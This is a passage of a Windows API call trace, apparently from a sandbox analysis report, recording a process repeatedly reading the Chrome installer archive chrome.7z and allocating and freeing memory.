(x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0063.960] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0063.960] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0xad7d02b [0063.960] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0063.960] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0063.960] ReleaseMutex (hMutex=0x168) returned 1 [0063.960] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="chrome.7z", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0063.960] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="chrome.7z", cchWideChar=9, lpMultiByteStr=0x1f7366c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="chrome.7z", lpUsedDefaultChar=0x0) returned 9 [0063.960] ReadFile (in: hFile=0x1d4, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0063.975] ReadFile (in: hFile=0x1d4, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0063.994] ReadFile (in: hFile=0x1d4, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0064.013] ReadFile (in: hFile=0x1d4, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0064.023] ReadFile (in: hFile=0x1d4, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0064.040] ReadFile (in: hFile=0x1d4, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0064.067] ReadFile (in: hFile=0x1d4, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0064.090] ReadFile (in: hFile=0x1d4, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0064.097] ReadFile (in: hFile=0x1d4, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0064.103] ReadFile (in: hFile=0x1d4, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0064.113] ReadFile (in: hFile=0x1d4, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0064.116] ReadFile (in: hFile=0x1d4, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0064.117] ReadFile (in: hFile=0x1d4, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0064.123] ReadFile (in: hFile=0x1d4, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0064.125] VirtualAlloc (lpAddress=0x0, dwSize=0x100000, flAllocationType=0x101000, flProtect=0x4) returned 0x7edd0000 [0064.142] ReadFile (in: hFile=0x1d4, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0064.422] ReadFile (in: hFile=0x1d4, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0064.425] ReadFile (in: hFile=0x1d4, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0064.425] VirtualQuery (in: lpAddress=0x7eed0000, lpBuffer=0x359f23c, dwLength=0x1c | out: lpBuffer=0x359f23c*(BaseAddress=0x7eed0000, AllocationBase=0x7eed0000, AllocationProtect=0x4, RegionSize=0x70000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0064.425] VirtualAlloc (lpAddress=0x0, dwSize=0x140000, flAllocationType=0x101000, flProtect=0x4) returned 0x7ec90000 [0065.024] VirtualQuery (in: lpAddress=0x7ec90000, lpBuffer=0x359f23c, dwLength=0x1c | out: lpBuffer=0x359f23c*(BaseAddress=0x7ec90000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x240000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0065.024] VirtualAlloc (lpAddress=0x7ec90000, dwSize=0xc0000, flAllocationType=0x2000, flProtect=0x4) returned 0x7ec90000 [0065.025] VirtualAlloc (lpAddress=0x7ec90000, dwSize=0xc0000, flAllocationType=0x1000, flProtect=0x4) returned 0x7ec90000 [0065.027] ReadFile (in: hFile=0x1d4, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0065.028] ReadFile (in: hFile=0x1d4, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0065.029] ReadFile (in: hFile=0x1d4, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0065.030] ReadFile (in: hFile=0x1d4, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0065.046] ReadFile (in: hFile=0x1d4, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0065.047] ReadFile (in: hFile=0x1d4, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0065.049] ReadFile (in: hFile=0x1d4, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0065.050] ReadFile (in: hFile=0x1d4, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0065.053] ReadFile (in: hFile=0x1d4, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0065.054] ReadFile (in: hFile=0x1d4, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0065.057] ReadFile (in: hFile=0x1d4, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0065.058] ReadFile (in: hFile=0x1d4, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0065.061] ReadFile (in: hFile=0x1d4, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0065.062] VirtualQuery (in: lpAddress=0x7ed50000, lpBuffer=0x359f23c, dwLength=0x1c | out: lpBuffer=0x359f23c*(BaseAddress=0x7ed50000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x180000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0065.062] VirtualAlloc (lpAddress=0x7ed50000, dwSize=0xf0000, flAllocationType=0x2000, flProtect=0x4) returned 0x7ed50000 [0065.062] VirtualAlloc (lpAddress=0x7ed50000, dwSize=0xf0000, flAllocationType=0x1000, flProtect=0x4) returned 0x7ed50000 [0065.064] ReadFile (in: hFile=0x1d4, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0065.360] ReadFile (in: hFile=0x1d4, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0065.362] ReadFile (in: hFile=0x1d4, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0065.363] ReadFile (in: hFile=0x1d4, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0065.367] ReadFile (in: hFile=0x1d4, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0065.368] ReadFile (in: hFile=0x1d4, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0065.371] ReadFile (in: hFile=0x1d4, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0065.372] ReadFile (in: hFile=0x1d4, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0065.389] ReadFile (in: hFile=0x1d4, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0065.390] ReadFile (in: hFile=0x1d4, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0065.392] ReadFile (in: hFile=0x1d4, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0065.394] ReadFile (in: hFile=0x1d4, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0065.397] ReadFile (in: hFile=0x1d4, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0065.398] ReadFile (in: hFile=0x1d4, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0065.650] ReadFile (in: hFile=0x1d4, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0065.651] ReadFile (in: hFile=0x1d4, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0065.651] VirtualQuery (in: lpAddress=0x7ee40000, lpBuffer=0x359f23c, dwLength=0x1c | out: lpBuffer=0x359f23c*(BaseAddress=0x7ee40000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x90000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0065.651] VirtualAlloc (lpAddress=0x7ee40000, dwSize=0x90000, flAllocationType=0x2000, flProtect=0x4) returned 0x7ee40000 [0065.651] VirtualAlloc (lpAddress=0x7ee40000, dwSize=0x90000, flAllocationType=0x1000, flProtect=0x4) returned 0x7ee40000 [0065.655] ReadFile (in: hFile=0x1d4, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0065.679] VirtualQuery (in: lpAddress=0x7eed0000, lpBuffer=0x359f23c, dwLength=0x1c | out: lpBuffer=0x359f23c*(BaseAddress=0x7eed0000, AllocationBase=0x7eed0000, AllocationProtect=0x4, RegionSize=0x70000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0065.679] VirtualAlloc (lpAddress=0x0, dwSize=0x660000, flAllocationType=0x101000, flProtect=0x4) returned 0x7e360000 [0066.011] VirtualQuery (in: lpAddress=0x7e9c0000, lpBuffer=0x359f208, dwLength=0x1c | out: lpBuffer=0x359f208*(BaseAddress=0x7e9c0000, AllocationBase=0x7e9c0000, AllocationProtect=0x4, RegionSize=0x2d0000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0066.012] VirtualFree (lpAddress=0x7e9c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0066.012] VirtualQuery (in: lpAddress=0x7ec90000, lpBuffer=0x359f208, dwLength=0x1c | out: lpBuffer=0x359f208*(BaseAddress=0x7ec90000, AllocationBase=0x7ec90000, AllocationProtect=0x4, RegionSize=0xc0000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0066.013] VirtualFree (lpAddress=0x7ec90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0066.013] VirtualQuery (in: lpAddress=0x7ed50000, lpBuffer=0x359f208, dwLength=0x1c | out: lpBuffer=0x359f208*(BaseAddress=0x7ed50000, AllocationBase=0x7ed50000, AllocationProtect=0x4, RegionSize=0xf0000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0066.013] VirtualFree (lpAddress=0x7ed50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0066.015] VirtualQuery (in: lpAddress=0x7ee40000, lpBuffer=0x359f208, dwLength=0x1c | out: lpBuffer=0x359f208*(BaseAddress=0x7ee40000, AllocationBase=0x7ee40000, AllocationProtect=0x4, RegionSize=0x90000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0066.015] VirtualFree (lpAddress=0x7ee40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0066.199] ReadFile (in: hFile=0x1d4, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0066.221] ReadFile (in: hFile=0x1d4, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0066.224] ReadFile (in: hFile=0x1d4, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0066.225] ReadFile (in: hFile=0x1d4, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0066.229] ReadFile (in: hFile=0x1d4, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0066.230] ReadFile (in: hFile=0x1d4, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0066.232] ReadFile (in: hFile=0x1d4, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0066.234] ReadFile (in: hFile=0x1d4, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0066.238] ReadFile (in: hFile=0x1d4, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0066.239] ReadFile (in: hFile=0x1d4, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0066.240] ReadFile (in: hFile=0x1d4, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0066.242] ReadFile (in: hFile=0x1d4, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0066.244] ReadFile (in: hFile=0x1d4, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0066.247] ReadFile (in: hFile=0x1d4, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0066.248] ReadFile (in: hFile=0x1d4, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0066.251] ReadFile (in: hFile=0x1d4, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0066.262] ReadFile (in: hFile=0x1d4, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0066.407] ReadFile (in: hFile=0x1d4, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0066.408] ReadFile (in: hFile=0x1d4, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0066.410] ReadFile (in: hFile=0x1d4, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0066.411] ReadFile (in: hFile=0x1d4, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0066.413] ReadFile (in: hFile=0x1d4, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0066.414] VirtualQuery (in: lpAddress=0x7e9c0000, lpBuffer=0x359f23c, dwLength=0x1c | out: lpBuffer=0x359f23c*(BaseAddress=0x7e9c0000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x510000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0066.414] VirtualAlloc (lpAddress=0x7e9c0000, dwSize=0x1a0000, flAllocationType=0x2000, flProtect=0x4) returned 0x7e9c0000 [0066.415] VirtualAlloc (lpAddress=0x7e9c0000, dwSize=0x1a0000, flAllocationType=0x1000, flProtect=0x4) returned 0x7e9c0000 [0066.417] ReadFile (in: hFile=0x1d4, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0066.418] ReadFile (in: hFile=0x1d4, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0066.419] ReadFile (in: hFile=0x1d4, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0066.420] ReadFile (in: hFile=0x1d4, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0066.422] ReadFile (in: hFile=0x1d4, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0066.423] ReadFile (in: hFile=0x1d4, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0066.426] ReadFile (in: hFile=0x1d4, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0066.427] ReadFile (in: hFile=0x1d4, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0066.430] ReadFile (in: hFile=0x1d4, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0066.431] ReadFile (in: hFile=0x1d4, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: 